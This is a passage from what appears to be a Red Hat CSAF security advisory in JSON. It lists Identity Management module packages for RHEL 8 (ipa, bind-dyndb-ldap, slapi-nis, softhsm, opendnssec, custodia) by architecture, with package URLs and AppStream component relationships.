"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"product": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x (idm:DL1)",
"product_id": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"product": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x (idm:DL1)",
"product_id": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x (idm:DL1)",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"product": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x (idm:DL1)",
"product_id": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"product": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x (idm:DL1)",
"product_id": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"product": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x (idm:DL1)",
"product_id": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 (idm:client)",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 (idm:client)",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 (idm:client)",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 (idm:client)",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 (idm:client)",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 (idm:client)",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1)",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1)",
"product_id": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1)",
"product_id": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1)",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1)",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1)",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1)",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1)",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1)",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1)",
"product_id": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1)",
"product_id": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1)",
"product_id": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1)",
"product_id": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 (idm:DL1)",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"product": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 (idm:DL1)",
"product_id": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"product": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 (idm:DL1)",
"product_id": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 (idm:DL1)",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"product": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 (idm:DL1)",
"product_id": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"product": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 (idm:DL1)",
"product_id": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 (idm:DL1)",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"product": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 (idm:DL1)",
"product_id": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"product": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 (idm:DL1)",
"product_id": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"product": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 (idm:DL1)",
"product_id": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "x86_64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src::idm:DL1"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1"
},
"product_reference": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src::idm:DL1"
},
"product_reference": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
